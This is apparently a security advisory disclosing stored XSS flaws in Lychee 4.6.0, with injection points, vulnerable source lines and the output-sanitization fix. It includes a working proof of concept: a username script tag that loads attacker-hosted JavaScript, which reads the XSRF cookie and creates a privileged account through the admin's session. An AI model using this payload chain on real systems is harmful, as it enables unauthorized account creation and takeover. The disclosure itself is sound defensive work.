Several XSS were found in Lychee 4.6.0. These vulnerabilities could allow unauthenticated users to to gain logged access to the platform by creating a new account.
While the front-end is on JS, Lychee versioning is tied to composer.

Details

Several XSS were found in Lychee 4.6.0. These vulnerabilities could allow unauthenticated users to to gain logged access to the platform by creating a new account.
One of them was pre authentication. The rest of them required an authenticated user account.

Using the unauthenticated XSS is was possible to create a new user by attempting to log with the non existing user <script src='172.0.0.1/a.js"/> with the file a.js containing the following:

fetch('http://172.17.0.2:80/api/User::create',{
    // create a POST request to be sent to the lychee instance located at `172.17.0.2`
    method: 'POST',
    // setup the headers
    headers: {
        'Content-Type': 'application/json',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        //the X-XSRF-TOKEN is retrieve from the cookie store as it is not `HttpOnly`
        'X-XSRF-TOKEN': document.cookie.split('=')[1].split('%')[0],
        'X-Requested-With': 'XMLHttpRequest',
},
    // body of the request containing the payload to create a new user with upload privileges
    body: '{"username":"xss_1","password":"xss","may_upload":true,"is_locked":false}'
});

Once the admin user viewed the "Show logs" page, his browser will request the a.js script located on the attacker
machine, execute its content, thus sending an HTTP request to create a new user. The admin browser will automatically include its session token and the new user will be created.

Affected location

The insertions point were:

• Username (unauthenticated): A attacker without an account could try to authenticate as as<script>alert(3)</script>df. The payload would be triggered when the admin user opened the application logs (/api/Logs::list). This could also be used as a log injection.
• Username (authenticated): A user can change its username to contain JS code (/api/Settings::updateLogin). The payload will be triggered:
  • when the admin user open the application logs (/api/Logs::list)
  • when a user want to share an album with other users (/api/Sharing::list)
  • (if the user has a non empty album) when the admin user access his landing pages as the admin get access to all albums and the username is supplied
• PhotoTitle: A user with sufficient permission can upload a photo whose title can contain JS code. The payload will be triggered on the delete confirmation message (/api/Photo::get)
• AlbumTitle: A user with sufficient permission can upload a photo whose title can contain JS code. The payload will be triggered on the delete confirmation message (/api/Album::get)
• PhotoDescription: A user with sufficient permission can change a photo description and insert JS code. The payload will triggered when a user display the photo (/api/Photo::get)

The code reflection points are listed below:

• Username:
  • Log: https://github.com/LycheeOrg/Lychee/blob/4aa4ffba1389e4dd6735e32e1d996647760c9655/app/Actions/Settings/UpdateLogin.php#L31
  • sharing album:

    Lychee-front/scripts/main/album.js

    Line 1047 in d656990

    <span class='label'>${user.username}</span>

  • admin albums:

    Lychee-front/scripts/main/view.js

    Line 79 in 75e260e

    html += build.divider(album.owner_name);

• PhotoTitle:

  Lychee-front/scripts/main/photo.js

  Line 348 in b582360

  msg = lychee.html`<p>${sprintf(lychee.locale["PHOTO_DELETE_CONFIRMATION"], photoTitle)}</p>`;

• AlbumTitle:

  Lychee-front/scripts/main/album.js

  Line 1250 in b582360

  msg = lychee.html`<p>${sprintf(lychee.locale[isTagAlbum ? "DELETE_TAG_ALBUM_CONFIRMATION" : "DELETE_ALBUM_CONFIRMATION"], albumTitle)}</p>`;

• PhotoDescription: https://github.com/LycheeOrg/Lychee-front/blob/master/scripts/main/build.js#L340

Patches

The project choose to fix the vulnerabilities by sanitizing the output and not performing any transformation on the user input..
#324 #325 fix the issues.

Workarounds

None.

References

https://owasp.org/www-community/attacks/xss/